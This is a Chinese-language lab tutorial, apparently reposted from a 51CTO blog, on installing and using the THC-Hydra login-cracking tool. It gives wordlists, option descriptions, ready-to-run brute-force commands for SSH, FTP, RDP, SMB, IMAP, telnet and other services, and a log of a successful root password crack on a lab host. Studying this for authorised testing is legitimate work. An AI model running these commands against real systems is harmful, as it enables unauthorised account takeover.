THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的
实验环境
centos6.5x64
实验安装
hydra-7.3.tar.gz
软件安装
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
tar zxvf hydra-7.3.tar.gz
cd hydra-7.3
./configure
make
make install
hydra -version
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
touch users.txt
less users.txt
root
admin
administrator
test
touch password.txt
less password.txt
1
123
123.com
aabbcc
systemadmin
使用说明
hydra -R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程
破解ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
破解ftp hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
破解https hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
破解teamspeak hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb hydra -l administrator -P pass.txt 10.36.16.18 smb
破解pop3 hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp hydra ip rdp -l administrator -P pass.txt -V
破解http-proxy hydra -l admin -P pass.txt http-proxy://10.36.16.18
破解imap hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
破解telnet hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-04-12 17:30:48
[DATA] 1 task, 1 server, 35 login tries (l:5/p:7), ~35 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.160 - login "root" - pass "root" - 1 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "root" - pass "" - 2 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "root" - pass "1" - 3 of 35 [child 0]
[22][ssh] host: 192.168.1.160 login: root password: 1 密码破解成功
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "admin" - 8 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "" - 9 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "1" - 10 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123" - 11 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123.com" - 12 of 35 [child 0]
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "aabbcc" - 13 of 35 [child 0]
本文转自 mailfile 51CTO博客,原文链接:http://blog.51cto.com/mailfile/1763094,如需转载请自行联系原作者